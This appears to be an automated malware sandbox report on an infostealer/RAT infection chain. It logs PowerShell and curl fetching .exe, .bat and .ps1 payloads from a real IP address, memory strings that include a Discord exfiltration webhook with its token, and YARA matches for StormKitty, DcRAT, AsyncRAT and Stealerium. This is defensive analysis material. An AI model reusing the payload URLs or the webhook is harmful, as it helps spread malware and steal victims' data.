0d ca 33 4f 29 3b 81 c3 22 e3 f2 4c ad 22 f7 8c 70 ee f5 a1 3c 31 7f 39 3b e3 59 46 98 20 f2 38 66 ea 4b 3f 12 e4 df 04 93 83 92 d6 9e 57 45 77 e8 3a c3 37 69 28 7d 08 d2 97 f4 6a 59 b3 32 a6 5d 75 7b e8 14 ac f8 91 31 43 fd e8 ad 72 7f fc a1 db 68 a8 fe 3a bf 62 e4 a1 05 9f af 76 4a fb 0a d0 aa c3 01 8b a1 6e db ab 11 f6 ba 16 d5 04 d7 8d fd 11 ad d7 35 ab 29 f6 63 b8 1d b1
            Source: global trafficHTTP traffic detected: GET /infopage/vfdjo.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /infopage/yijth.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
            Source: Joe Sandbox ViewIP Address: 147.45.44.131 147.45.44.131
            Source: Joe Sandbox ViewASN Name: FCNUniversityPublicCorporationOsakaJP FCNUniversityPublicCorporationOsakaJP
            Source: global trafficHTTP traffic detected: GET /infopage/gqub.bat HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.44.131Connection: Keep-Alive
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: global trafficHTTP traffic detected: GET /infopage/gqub.bat HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.44.131Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /infopage/vfrcxq.ps1 HTTP/1.1Host: 147.45.44.131User-Agent: curl/7.83.1Accept: */*X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
            Source: global trafficHTTP traffic detected: GET /infopage/vfdjo.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /infopage/yijth.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
            Source: powershell.exe, 00000000.00000002.1691372852.0000020101632000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44
            Source: powershell.exe, 00000000.00000002.1691372852.0000020101782000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800480910.00000277AEED0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800480910.00000277AD36E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800480910.00000277AEFB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131
            Source: powershell.exe, 00000000.00000002.1691372852.0000020101632000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1691372852.0000020101782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/gqub.bat
            Source: curl.exe, 00000005.00000002.1697801722.000002870BD89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/v
            Source: powershell.exe, 00000004.00000002.1800480910.00000277AD36E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/vfdjo.exe
            Source: csc.exe, 00000006.00000002.1728658572.000001CEA7F29000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000007.00000002.1725482794.000001EFAC3D0000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000007.00000002.1725516419.000001EFAC3F9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4131244928.0000000001730000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4149072084.0000000005570000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4152499625.00000000065B0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4146688512.0000000005486000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4130529842.0000000001560000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4128014946.00000000012AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/vfrcxq.ps1
            Source: RegAsm.exe, 00000008.00000002.4128014946.00000000012AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/vfrcxq.ps1$
            Source: RegAsm.exe, 00000008.00000002.4149072084.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/vfrcxq.ps1Dt
            Source: RegAsm.exe, 00000008.00000002.4128014946.00000000012AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/vfrcxq.ps1T
            Source: RegAsm.exe, 00000008.00000002.4130529842.0000000001560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/vfrcxq.ps1USERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAM
            Source: RegAsm.exe, 00000008.00000002.4149072084.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/vfrcxq.ps1me
            Source: curl.exe, 00000005.00000002.1697801722.000002870BD89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/vfrcxq.ps1n
            Source: curl.exe, 00000005.00000002.1697801722.000002870BD97000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1697656938.000002870BD94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/vfrcxq.ps1phlpapi.dll
            Source: csc.exe, 00000006.00000002.1728658572.000001CEA7F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/vfrcxq.ps1t
            Source: curl.exe, 00000005.00000002.1697801722.000002870BD89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/vfrcxq.ps1urlrc
            Source: curl.exe, 00000005.00000002.1697801722.000002870BD89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/vfrcxq.ps1urlrc6
            Source: cvtres.exe, 00000007.00000002.1725482794.000001EFAC3D0000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000007.00000002.1725516419.000001EFAC3F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/vfrcxq.ps1userdomain=user-PCuserdomain_roamingprofile=user-PCusernam
            Source: curl.exe, 00000005.00000002.1697801722.000002870BD89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/vfrcxq.ps1v
            Source: curl.exe, 00000005.00000002.1697801722.000002870BD89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/vm
            Source: powershell.exe, 00000004.00000002.1800480910.00000277AEFB4000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000006.00000003.1725747663.000001CEA7FA6000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000003.1727521083.000001CEA814B000.00000004.00001000.00020000.00000000.sdmp, csc.exe, 00000006.00000003.1725855115.000001CEA7FB7000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000003.1725667893.000001CEA7FC9000.00000004.00000020.00020000.00000000.sdmp, 03bjtjx4.0.cs.4.dr, 03bjtjx4.dll.6.drString found in binary or memory: http://147.45.44.131/infopage/yijth.exe
            Source: csc.exe, 00000006.00000003.1725690135.000001CEA7FB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/yijth.exeF
            Source: powershell.exe, 00000004.00000002.1800480910.00000277AEF98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.H
            Source: RegAsm.exe, 00000008.00000002.4131244928.0000000001730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.S
            Source: RegAsm.exe, 00000008.00000002.4146688512.00000000054A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.d
            Source: RegAsm.exe, 00000008.00000002.4149072084.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
            Source: 77EC63BDA74BD0D0E0426DC8F80085060.8.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: RegAsm.exe, 00000008.00000002.4129101776.0000000001347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabX
            Source: powershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io/ip
            Source: RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
            Source: powershell.exe, 00000000.00000002.1691372852.0000020101BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1718918139.00000201101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1718918139.0000020110074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000004.00000002.1800480910.00000277AD36E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000000.00000002.1691372852.0000020100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800480910.00000277AD0B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4131974339.0000000002F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000004.00000002.1800480910.00000277AD36E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.newtonsoft.com/jsonschema
            Source: powershell.exe, 00000000.00000002.1691372852.0000020100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800480910.00000277AD0B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000004.00000002.1859609945.00000277BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000004.00000002.1859609945.00000277BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000004.00000002.1859609945.00000277BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5
            Source: RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v6/users/
            Source: powershell.exe, 00000004.00000002.1800480910.00000277AEF9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800480910.00000277AD5D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800480910.00000277AEFB4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://github.com/LimerBoy/StormKitty
            Source: powershell.exe, 00000004.00000002.1800480910.00000277AD36E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000000.00000002.1691372852.0000020100C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800480910.00000277AE044000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000000.00000002.1718918139.00000201101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1718918139.0000020110074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
            Source: powershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354cIt
            Source: powershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
            Source: powershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_see
            Source: powershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_seeaCould

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTR
            Source: Yara matchFile source: 4.2.powershell.exe.277bdaf215a.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd4046b2.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd6d0998.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7976, type: MEMORYSTR
            Source: Yara matchFile source: 4.2.powershell.exe.277bdaf215a.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd4046b2.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd6d0998.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7976, type: MEMORYSTR

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7976, type: MEMORYSTR

            System Summary

            barindex
            Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: dump.pcap, type: PCAPMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 4.2.powershell.exe.277af070e20.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 4.2.powershell.exe.277af06a9f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 4.2.powershell.exe.277ad61cd00.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 4.2.powershell.exe.277aef9f226.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 4.2.powershell.exe.277ad5d9448.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 4.2.powershell.exe.277ad5d5fbe.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 4.2.powershell.exe.277aefb4be0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 4.2.powershell.exe.277aef9f226.6.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 4.2.powershell.exe.277bdaf215a.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 4.2.powershell.exe.277bdaf215a.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Stealerium based on specific strings Author: Sekoia.io
            Source: 4.2.powershell.exe.277bdaf215a.10.raw.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
            Source: 4.2.powershell.exe.277bdaf215a.10.raw.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
            Source: 4.2.powershell.exe.277bdaf215a.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
            Source: 4.2.powershell.exe.277bdaf215a.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
            Source: 4.2.powershell.exe.277bdaf215a.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: 4.2.powershell.exe.277bdaf215a.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
            Source: 4.2.powershell.exe.277bdaf215a.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
            Source: 4.2.powershell.exe.277bdaf215a.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 8.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 8.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Stealerium based on specific strings Author: Sekoia.io
            Source: 8.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
            Source: 8.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
            Source: 8.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
            Source: 8.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
            Source: 8.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: 8.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
            Source: 8.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
            Source: 8.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 4.2.powershell.exe.277ad5d5fbe.3.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects Stealerium based on specific strings Author: Sekoia.io
            Source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
            Source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
            Source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
            Source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
            Source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
            Source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
            Source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 4.2.powershell.exe.277bd4046b2.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 4.2.powershell.exe.277bd4046b2.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects Stealerium based on specific strings Author: Sekoia.io
            Source: 4.2.powershell.exe.277bd4046b2.11.raw.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
            Source: 4.2.powershell.exe.277bd4046b2.11.raw.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
            Source: 4.2.powershell.exe.277bd4046b2.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
            Source: 4.2.powershell.exe.277bd4046b2.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
